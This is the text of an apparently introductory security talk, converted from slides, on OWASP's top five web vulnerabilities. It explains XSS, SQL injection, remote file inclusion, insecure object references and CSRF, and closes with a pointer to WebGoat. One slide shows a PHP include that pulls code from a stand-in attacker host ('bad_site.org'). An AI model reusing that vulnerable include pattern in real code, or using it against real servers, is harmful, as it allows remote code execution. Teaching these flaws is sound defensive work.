Hacker’s Secrets Sharmishtha Gupta [email_address]

Agenda What is OWASP? Web security vs Network security OWASP Top 5 XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF)

What is OWASP?

Web security vs Network security

OWASP Top 5

XSS

Sql Injection

Malicious File Execution

Insecure Direct Object Reference

Cross Site Request Forgery (CSRF)

What is OWASP? Web security vs Network security OWASP Top 5 Open Web Application Security Project Mission: An open community focused on web application security

Open Web Application Security Project

Mission: An open community focused on web application security

What is OWASP? Web security vs Network security OWASP Top 5 Global Community Local Bangalore Chapter: http://www.owasp.org/index.php/Bangalore Open source projects and tools to improve web application security Open learning resources and forum on web security

Global Community

Local Bangalore Chapter: http://www.owasp.org/index.php/Bangalore

Open source projects and tools to improve web application security

Open learning resources and forum on web security

What is OWASP? Web security vs Network security OWASP Top 5 Network Security Challenge is to restrict access to network and network resources (servers) To protect data being exchanged over network from eavesdroppers Mostly network layer stuff (packet filtering, firewalls etc) Attacker Web Server

Network Security

Challenge is to restrict access to network and network resources (servers)

To protect data being exchanged over network from eavesdroppers

Mostly network layer stuff (packet filtering, firewalls etc)

What is OWASP? Web security vs Network security OWASP Top 5 Web Security Network is already accessible on port 80 (or other webserver port) Challenge is to protect other network resources which are not exposed, e.g. information stored in db, other backend information Compromised Web Server Victim

Web Security

Network is already accessible on port 80 (or other webserver port)

Challenge is to protect other network resources which are not exposed, e.g. information stored in db, other backend information

What is OWASP? Web security vs Network security OWASP Top 5 Top 5 webapp vulnerabilities XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF)

Top 5 webapp vulnerabilities

XSS

Sql Injection

Malicious File Execution

Insecure Direct Object Reference

Cross Site Request Forgery (CSRF)

XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF ) When user provided data is used without validation and/or encoding An attacker can execute a script in victim’s browser and hijack important user information without her knowing Ex: Alice sends a scrap to Bob on Orkut with a scriptlet. When Bob opens his scrapbook, everyone in his network is sent spam scraps posing as Bob by the scriptlet.

When user provided data is used without validation and/or encoding

An attacker can execute a script in victim’s browser and hijack important user information without her knowing

Ex:

Alice sends a scrap to Bob on Orkut with a scriptlet.

When Bob opens his scrapbook, everyone in his network is sent spam scraps posing as Bob by the scriptlet.

XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF ) A real example is “Samy worm” on MySpace.com discovered in October, 2005 http://namb.la/popular/tech.html Demo

A real example is “Samy worm” on MySpace.com discovered in October, 2005

http://namb.la/popular/tech.html

Demo

XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) When user provided data is sent to an interpreter (here sql) as part of a command or query An attacker can trick the interpreter into executing unintended commands or changing data Demo

When user provided data is sent to an interpreter (here sql) as part of a command or query

An attacker can trick the interpreter into executing unintended commands or changing data

Demo

XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) When user provided input is used for executing a remote code or loading local files Allows attackers to include hostile code and data; can totally compromise the server

When user provided input is used for executing a remote code or loading local files

Allows attackers to include hostile code and data; can totally compromise the server

XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) Most common sources of code injection are: Dynamic paths/files used in require/include statements eval(): A major source of code injection is the improper validation of eval() using user provided inputs.

Most common sources of code injection are:

Dynamic paths/files used in require/include statements

eval(): A major source of code injection is the improper validation of eval() using user provided inputs.

XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) <?php //dynamic path $_GET['path'] = ‘http://bad_site.org’; include &quot;$_GET[‘path’]/header.inc&quot;; ?>

<?php

//dynamic path

$_GET['path'] = ‘http://bad_site.org’;

include &quot;$_GET[‘path’]/header.inc&quot;;

?>

XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) If a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter Attackers can manipulate those references to access other objects without authorization

If a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter

Attackers can manipulate those references to access other objects without authorization

XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) Poor error handling is the main cause Demos Bad file inclusion Sql connect failure

Poor error handling is the main cause

Demos

Bad file inclusion

Sql connect failure

XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) An attack that forces a logged-on victim’s browser to send a pre-authenticated request to a vulnerable web application This can be as powerful as the web application that it attacks

An attack that forces a logged-on victim’s browser to send a pre-authenticated request to a vulnerable web application

This can be as powerful as the web application that it attacks

XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) Mostly when source of request is not validated Gmail change password CSRF vulnerability disclosed by Vicente on 3 rd Mar 2009 http://seclists.org/fulldisclosure/2009/Mar/0029.html Demo

Mostly when source of request is not validated

Gmail change password CSRF vulnerability disclosed by Vicente on 3 rd Mar 2009

http://seclists.org/fulldisclosure/2009/Mar/0029.html

Demo

Visit Webgoat from OWASP Good to solve the puzzles by learning vulnerabilities Good hints and solutions Download from http://code.google.com/p/webgoat/downloads/list

Webgoat from OWASP

Good to solve the puzzles by learning vulnerabilities

Good hints and solutions

Download from http://code.google.com/p/webgoat/downloads/list